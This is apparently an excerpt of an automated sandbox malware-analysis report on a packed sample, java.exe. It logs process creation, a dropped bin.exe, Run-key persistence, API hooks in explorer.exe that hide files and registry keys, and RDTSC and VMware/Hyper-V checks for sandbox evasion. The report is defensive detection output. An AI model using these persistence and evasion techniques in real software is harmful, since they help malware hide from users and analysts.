            Source: C:\Users\user\Desktop\java.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\java.exeProcess created: C:\Windows\SysWOW64\winver.exe winver
            Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Roaming\0C0BC82C\bin.exe "C:\Users\user\AppData\Roaming\0C0BC82C\bin.exe"
            Source: C:\Users\user\AppData\Roaming\0C0BC82C\bin.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Roaming\0C0BC82C\bin.exe "C:\Users\user\AppData\Roaming\0C0BC82C\bin.exe"
            Source: C:\Users\user\AppData\Roaming\0C0BC82C\bin.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\java.exeProcess created: C:\Windows\SysWOW64\winver.exe winverJump to behavior
            Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Roaming\0C0BC82C\bin.exe "C:\Users\user\AppData\Roaming\0C0BC82C\bin.exe" Jump to behavior
            Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Roaming\0C0BC82C\bin.exe "C:\Users\user\AppData\Roaming\0C0BC82C\bin.exe" Jump to behavior
            Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B196B286-BAB4-101A-B69C-00AA00341D07}\InprocServer32Jump to behavior
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: java.exeStatic PE information: section name: .imports
            Source: bin.exe.2.drStatic PE information: section name: .imports
            Source: C:\Users\user\Desktop\java.exeCode function: 0_2_02230C1A push edi; ret 0_2_02230C56
            Source: C:\Users\user\Desktop\java.exeCode function: 0_2_02230B89 push edi; ret 0_2_02230C56
            Source: C:\Windows\SysWOW64\winver.exeCode function: 2_2_03390B65 push edi; ret 2_2_03390C32
            Source: C:\Windows\SysWOW64\winver.exeCode function: 2_2_03390BF6 push edi; ret 2_2_03390C32
            Source: C:\Windows\explorer.exeCode function: 3_2_01340B65 push edi; ret 3_2_01340C32
            Source: C:\Windows\explorer.exeCode function: 3_2_01340BF6 push edi; ret 3_2_01340C32
            Source: C:\Windows\explorer.exeCode function: 3_2_01370B65 push edi; ret 3_2_01370C32
            Source: C:\Windows\explorer.exeCode function: 3_2_01370BF6 push edi; ret 3_2_01370C32
            Source: C:\Windows\System32\sihost.exeCode function: 4_2_00AC0BF6 push edi; ret 4_2_00AC0C32
            Source: C:\Windows\System32\sihost.exeCode function: 4_2_00AC0B65 push edi; ret 4_2_00AC0C32
            Source: C:\Windows\System32\svchost.exeCode function: 5_2_00910BF6 push edi; ret 5_2_00910C32
            Source: C:\Windows\System32\svchost.exeCode function: 5_2_00910B65 push edi; ret 5_2_00910C32
            Source: C:\Windows\System32\svchost.exeCode function: 6_2_009A0BF6 push edi; ret 6_2_009A0C32
            Source: C:\Windows\System32\svchost.exeCode function: 6_2_009A0B65 push edi; ret 6_2_009A0C32
            Source: C:\Windows\System32\ctfmon.exeCode function: 7_2_00A50BF6 push edi; ret 7_2_00A50C32
            Source: C:\Windows\System32\ctfmon.exeCode function: 7_2_00A50B65 push edi; ret 7_2_00A50C32
            Source: C:\Windows\System32\svchost.exeCode function: 8_2_00D40BF6 push edi; ret 8_2_00D40C32
            Source: C:\Windows\System32\svchost.exeCode function: 8_2_00D40B65 push edi; ret 8_2_00D40C32
            Source: C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exeCode function: 9_2_00B50BF6 push edi; ret 9_2_00B50C32
            Source: C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exeCode function: 9_2_00B50B65 push edi; ret 9_2_00B50C32
            Source: C:\Windows\System32\RuntimeBroker.exeCode function: 10_2_00110B65 push edi; ret 10_2_00110C32
            Source: C:\Windows\System32\RuntimeBroker.exeCode function: 10_2_00110BF6 push edi; ret 10_2_00110C32
            Source: C:\Users\user\AppData\Roaming\0C0BC82C\bin.exeCode function: 13_2_001C0B65 push edi; ret 13_2_001C0C32
            Source: C:\Users\user\AppData\Roaming\0C0BC82C\bin.exeCode function: 13_2_001C0BF6 push edi; ret 13_2_001C0C32
            Source: C:\Users\user\AppData\Roaming\0C0BC82C\bin.exeCode function: 13_2_02300C1A push edi; ret 13_2_02300C56
            Source: C:\Users\user\AppData\Roaming\0C0BC82C\bin.exeCode function: 13_2_02301A92 push esi; ret 13_2_02301A94
            Source: C:\Users\user\AppData\Roaming\0C0BC82C\bin.exeCode function: 13_2_02301B61 push esi; ret 13_2_02301B63
            Source: C:\Users\user\AppData\Roaming\0C0BC82C\bin.exeCode function: 13_2_02300B89 push edi; ret 13_2_02300C56
            Source: C:\Windows\System32\RuntimeBroker.exeCode function: 15_2_00AB0BF6 push edi; ret 15_2_00AB0C32
            Source: C:\Windows\System32\RuntimeBroker.exeCode function: 15_2_00AB0B65 push edi; ret 15_2_00AB0C32
            Source: C:\Windows\System32\smartscreen.exeCode function: 16_2_00290B65 push edi; ret 16_2_00290C32
            Source: initial sampleStatic PE information: section name: UPX0
            Source: initial sampleStatic PE information: section name: UPX1
            Source: initial sampleStatic PE information: section name: UPX0
            Source: initial sampleStatic PE information: section name: UPX1
            Source: C:\Windows\SysWOW64\winver.exeFile created: C:\Users\user\AppData\Roaming\0C0BC82C\bin.exeJump to dropped file

            Boot Survival

            barindex
            Creates autostart registry keys with suspicious names
            Source: C:\Windows\SysWOW64\winver.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 0C0BC82CJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 0C0BC82CJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 0C0BC82CJump to behavior

            Hooking and other Techniques for Hiding and Protection

            barindex
            Hooks files or directories query functions (used to hide files and directories)
            Source: explorer.exeIAT, EAT, inline or SSDT hook detected: function: NtQueryDirectoryFile
            Hooks registry keys query functions (used to hide registry keys)
            Source: explorer.exeIAT, EAT, inline or SSDT hook detected: function: ZwEnumerateValueKey
            Modifies the prolog of user mode functions (user mode inline hooks)
            Source: explorer.exeUser mode code has changed: module: ntdll.dll function: ZwResumeThread new code: 0xE9 0x9E 0xE1 0x12 0x25 0x51
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
            Source: SearchApp.exe, 0000000B.00000003.1882108297.0000024B5A153000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: {6D809377-6AF0-444B-8957-A3773F02200E}\WIRESHARK\WIRESHARK.EXE
            Source: SearchApp.exe, 0000000B.00000003.1882108297.0000024B5A153000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: 26720RANDOMSALADGAMESLLC.SIMPLEFREECELL_KX24DQMAZQK8J!APP{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\HYPERSNAP 6\HPRSNAP6.EXE{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\TRACKER\TRACKER.EXE{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\MOBIRISE4\MOBIRISE.EXE{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\DOMAIN.MSC{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\CEH-HOD\CEH.BATPP{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\SYNERGETIC\SYNERGY.EXE{6D809377-6AF0-444B-8957-A3773F02200E}\MEDIAINFO\MEDIAINFO.EXE{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\AEGISUB\AEGISUB32.EXE{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\PUREVPN\PUREVPN.EXE{6D809377-6AF0-444B-8957-A3773F02200E}\DBEAVER\DBEAVER.EXESAMSUNGELECTRONICSCOLTD.SAMSUNGNOTES_WYX1VJ98G3ASY!APP12009
            Source: SearchApp.exe, 0000000B.00000003.1882108297.0000024B5A153000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: {7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\FIDDLER2\FIDDLER.EXE
            Source: SearchApp.exe, 0000000B.00000003.1882108297.0000024B5A153000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: {7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\MOBIRISE4\MOBIRISE.EXE
            Source: SearchApp.exe, 0000000B.00000003.1882108297.0000024B5A153000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: {6D809377-6AF0-444B-8957-A3773F02200E}\HEIDISQL\HEIDISQL.EXE{6D809377-6AF0-444B-8957-A3773F02200E}\WIRESHARK\WIRESHARK.EXE{6D809377-6AF0-444B-8957-A3773F02200E}\GIMP 2\BIN\GIMP-2.10.EXE{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\ODBCAD32.EXE8593E
            Source: SearchApp.exe, 0000000B.00000003.1882108297.0000024B5A153000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: {7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\ESTSOFT\ALPDF\ALPDF.EXE{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\I4TOOLS7\I4TOOLS.EXE{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\FIDDLER2\FIDDLER.EXE{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\CARS\APPS\BIN\CARS.EXE{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\WINSTEP\NEXUS.EXE11267
            Tries to detect virtualization through RDTSC time measurements
            Source: C:\Windows\SysWOW64\winver.exeRDTSC instruction interceptor: First address: 0000000003392FAD second address: 0000000003392FD6 instructions: 0x00000000 rdtsc 0x00000002 mov eax, edx 0x00000004 stosd 0x00000005 mov eax, dword ptr [ebx+004042B5h] 0x0000000b stosd 0x0000000c mov eax, dword ptr [ebx+004042B9h] 0x00000012 stosd 0x00000013 mov eax, dword ptr [ebx+00406820h] 0x00000019 stosd 0x0000001a mov eax, dword ptr [ebx+00406824h] 0x00000020 stosd 0x00000021 lea eax, dword ptr [ebp-00000700h] 0x00000027 sub edi, eax 0x00000029 rdtsc
            Source: C:\Users\user\Desktop\java.exeCode function: 0_2_02230005 rdtsc 0_2_02230005
            Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 833Jump to behavior
            Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 803Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeDecision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)graph_2-2921
            Source: C:\Windows\SysWOW64\winver.exe TID: 7468Thread sleep count: 167 > 30Jump to behavior
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\winver.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\winver.exeLast function: Thread delayed
            Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
            Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
            Source: C:\Windows\System32\ctfmon.exeLast function: Thread delayed
            Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
            Source: C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exeLast function: Thread delayed
            Source: C:\Windows\System32\RuntimeBroker.exeLast function: Thread delayed
            Source: C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\RuntimeBroker.exeLast function: Thread delayed
            Source: C:\Windows\System32\smartscreen.exeLast function: Thread delayed
            Source: C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\RuntimeBroker.exeLast function: Thread delayed
            Source: C:\Windows\System32\RuntimeBroker.exeLast function: Thread delayed
            Source: C:\Windows\System32\ApplicationFrameHost.exeLast function: Thread delayed
            Source: C:\Windows\System32\RuntimeBroker.exeLast function: Thread delayed
            Source: C:\Windows\System32\oobe\UserOOBEBroker.exeLast function: Thread delayed
            Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
            Source: C:\Windows\System32\dllhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\RuntimeBroker.exeLast function: Thread delayed
            Source: C:\Windows\System32\RuntimeBroker.exeLast function: Thread delayed
            Source: svchost.exe, 00000005.00000000.1715147840.00000151A4AAE000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: @os=windows; osVer=10.0.19045.2006; lcid=en-GB; deviceType=9; deviceModel=VMware, Inc./VMware20,1;I!
            Source: explorer.exe, 00000003.00000002.3031801494.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3031801494.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1636199688.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1636199688.000000000982D000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000006.00000000.1718266506.0000019E29F00000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.2948940372.0000019E29F00000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: SearchApp.exe, 0000000B.00000003.1882108297.0000024B5A153000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Microsoft.Office.Excel_8wekyb3d8bbwe!microsoft.excel{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\RemotePC\RPCSuite.exeAirWatchLLC.VMwareWorkspaceONE_htcwkw4rx2gx4!App11496{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\Vector Magic\vmde.exe{6D809377-6AF0-444B-8957-A3773F02200E}\vJoy\x64\vJoyConf.exe{6D809377-6AF0-444B-8957-A3773F02200E}\YoloMouse\YoloMouse.exe{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\ExitLag\ExitLag.exe{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\Jitsi\Jitsi.exeMAGIX.MusicMakerJam_a2t3txkz9j1jw!MAGIX.MusicMakerJam.App11626{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\ASUS\Splendid\ACVT.exe{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\Pritunl\pritunl.exeMicrosoft.HoganThreshold_8wekyb3d8bbwe!xgame.App
            Source: explorer.exe, 00000003.00000000.1637129940.0000000009977000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
            Source: SearchApp.exe, 0000000B.00000000.1797450893.0000024B44184000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000B.00000000.1767315960.0000024B41F45000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000B.00000000.1780931087.0000024B42D43000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: var fbpkgiid = fbpkgiid || {}; fbpkgiid.page = '';;(function(BingAtWork) { if (typeof (bfbWsbTel) !== "undefined") { BingAtWork.WsbWebTelemetry.init({"cfg":{"e":true,"env":"PROD","t":"33d70a864599496b982a39f036f71122-2064703e-3a9d-4d90-8362-eec08dffe8e8-7176"},"ig":"892FA07886414BDF8EE1764A59FF39C6","ConversationId":"21139c92-d559-45ad-9d8f-73e2a64bf7e7","LogicalId":"30363daf-0e99-4b56-afae-f0c5eee8522a","tid":"651d53d035ec4c7eba14a4092e8aedb0","sid":"193A581F83766B4319784BBF829B6A16","uid":"","muid":"6666694284484FA1B35CCB433D42E997","puid":null,"isMtr":false,"tn":null,"tnid":null,"msa":false,"mkt":"en-us","b":"edge","eref":"Ref A: 651d53d035ec4c7eba14a4092e8aedb0 Ref B: MWHEEEAP0024F6D Ref C: 2023-10-04T12:00:16Z","vs":{"BAW12":"BFBBCEJIT2","BAW2":"BFBSPRC","BAW5":"PREMSBCUSTVERT","BAW7":"BFBPROWSBINITCF","CLIENT":"WINDOWS","COLUMN":"SINGLE","FEATURE.BFBBCEJIT":"1","FEATURE.BFBBCEJIT2":"1","FEATURE.BFBEDUQWQSCLKWSB":"1","FEATURE.BFBPROWSBINITCF":"1","FEATURE.BFBREFRPLAN":"1","FEATURE.BFBSPRC":"1","FEATURE.BFBWSBRS0830TF":"1","FEATURE.MSAAUTOJOIN":"1","FEATURE.MSBDSBIGLEAM":"1","FEATURE.MSBDSBORGV2":"1","FEATURE.MSBDSBORGV2CO":"1","FEATURE.MSBWDSBI920T1":"1","FEATURE.MSNSBT1":"1","FEATURE.WSBREF-T":"1","MKT":"EN-US","MS":"0","NEWHEADER":"1","THEME":"THBRAND","UILANG":"EN"},"dev":"DESKTOP","os":"WINDOWS","osver":"11","dc":"CoreUX-Prod-MWHE01","canvas":"","sci":true,"isMidgardEnabled":true,"isHomepage":false,"snrVersion":"2023.10.03.39942242"}); } })(BingAtWork || (BingAtWork = {}));;_w.rms.js({'A:rms:answers:BoxModel:Framework':'https:\/\/r.bing.com\/rb\/18\/jnc,nj\/6hU_LneafI_NFLeDvM367ebFaKQ.js?bu=Dx0ma3d6fXRucbIBtQEmpQEmuAE&or=w'});;
            Source: SearchApp.exe, 0000000B.00000000.1781018037.0000024B42D64000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware.View.Client
            Source: winver.exe, 00000002.00000002.2893076976.0000000003287000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll}}
            Source: explorer.exe, 00000003.00000002.2985052008.00000000079FB000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}'
            Source: SearchApp.exe, 0000000B.00000003.1815167421.0000024B5A502000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: *|vmware horizon client*|vm ware8394
            Source: explorer.exe, 00000003.00000000.1637129940.0000000009977000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00
            Source: explorer.exe, 00000003.00000000.1634162143.00000000078AD000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: NXTTAVMWare
            Source: SearchApp.exe, 0000000B.00000003.1812545124.0000024B5CBD6000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: net\5.1.0*|vmware workstation 12 player*|vmpl5459
            Source: SearchApp.exe, 0000000B.00000000.1781018037.0000024B42D64000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware.View.Client12451
            Source: explorer.exe, 00000003.00000002.3031801494.0000000009815000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f&0&000000
            Source: SearchApp.exe, 0000000B.00000003.1883649123.0000024B5CBD7000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: *|vmware horizon client*|vmare7220\nero.exe
            Source: explorer.exe, 00000003.00000002.2985052008.0000000007A34000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1634162143.0000000007A34000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWen-GBnx
            Source: SearchApp.exe, 0000000B.00000003.1815167421.0000024B5A502000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: *|vmware workstation 12 player*|vmpl5459
            Source: SearchApp.exe, 0000000B.00000003.1815167421.0000024B5A502000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: *|*|vmware6886
            Source: SearchApp.exe, 0000000B.00000003.1815167421.0000024B5A54E000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000B.00000003.1815167421.0000024B5A502000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: *|hyper-v manager*|vm4595
            Source: SearchApp.exe, 0000000B.00000003.1804124700.0000024B44464000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: |*|qemu10642
            Source: explorer.exe, 00000003.00000000.1636199688.0000000009660000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000er
            Source: SearchApp.exe, 0000000B.00000000.1855361847.0000024B55CC4000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware.Horizon.Client
            Source: SearchApp.exe, 0000000B.00000003.1815167421.0000024B5A502000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: *|vmware horizon client*|vmare7220
            Source: RuntimeBroker.exe, 0000000A.00000002.2923038092.000001ECFA2A4000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
            Source: explorer.exe, 00000003.00000000.1637129940.00000000098A8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: k&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
            Source: SearchApp.exe, 0000000B.00000003.1815167421.0000024B5A502000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: *|vmware workstation 15 player*|vmplayer6438
            Source: explorer.exe, 00000003.00000002.2905026359.0000000001240000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&0000000}
            Source: explorer.exe, 00000003.00000002.2985052008.00000000079FB000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
            Source: SearchApp.exe, 0000000B.00000003.1812545124.0000024B5CBD6000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: !!!!!!!MKKSkSe*|vmware vsphere client*|vspe6388
            Source: SearchApp.exe, 0000000B.00000003.1812545124.0000024B5CBD6000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: E}\MediaHuman\A*|vmware horizon client*|vdi3894
            Source: SearchApp.exe, 0000000B.00000003.1815167421.0000024B5A54E000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000B.00000003.1815167421.0000024B5A502000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: *|*|qemu10642
            Source: SearchApp.exe, 0000000B.00000000.1771919499.0000024B425C1000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000B.00000000.1759250182.00000243411CA000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: https://r.bing.com/rb/18/jnc,nj/6hU_LneafI_NFLeDvM367ebFaKQ.js?bu=Dx0ma3d6fXRucbIBtQEmpQEmuAE&or=w
            Source: svchost.exe, 00000005.00000000.1715147840.00000151A4AAE000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: @os=windows; osVer=10.0.19045.2006; lcid=en-GB; deviceType=9; deviceModel=VMware, Inc./VMware20,1;nlse]
            Source: SearchApp.exe, 0000000B.00000003.1815167421.0000024B5A54E000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000B.00000003.1815167421.0000024B5A502000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: *|hyper-v manager*|hyperv4178
            Source: SearchApp.exe, 0000000B.00000000.1855361847.0000024B55CC4000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware.Workstation.vmui
            Source: SearchApp.exe, 0000000B.00000003.1815167421.0000024B5A54E000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000B.00000003.1815167421.0000024B5A502000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: *|hyper-v manager*|virtual5441
            Source: explorer.exe, 00000003.00000000.1640106442.000000000CA7C000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}r.exe
            Source: SearchApp.exe, 0000000B.00000003.1812545124.0000024B5CBD6000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: {7C5A4*|vmware vsphere client*|vcenter5038
            Source: SearchApp.exe, 0000000B.00000003.1812545124.0000024B5CBD6000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: F-A0FB-4BFC-874*|vmware horizon client*|vmare7220
            Source: explorer.exe, 00000003.00000000.1640106442.000000000CA7C000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\8b}\
            Source: svchost.exe, 00000005.00000000.1715119977.00000151A4A90000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.2921088315.00000151A4A90000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000B.00000000.1754943527.000002433B786000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: SearchApp.exe, 0000000B.00000003.1882108297.0000024B5A153000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: AirWatchLLC.VMwareWorkspaceONE_htcwkw4rx2gx4!App
            Source: SearchApp.exe, 0000000B.00000003.1882108297.0000024B5A153000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: {6D809377-6AF0-444B-8957-A3773F02200E}\Hyper-V\VMCreate.exe
            Source: explorer.exe, 00000003.00000002.2985052008.00000000078A0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}$
            Source: explorer.exe, 00000003.00000002.3031801494.0000000009815000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: NECVMWar VMware SATA CD00\w
            Source: explorer.exe, 00000003.00000000.1637129940.00000000098A8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
            Source: SearchApp.exe, 0000000B.00000003.1812545124.0000024B5CBD6000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: l 2017\Petrel*|vmware horizon client*|vm ware8394
            Source: SearchApp.exe, 0000000B.00000003.1815167421.0000024B5A502000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: *|vmware vsphere client*|vspe6388
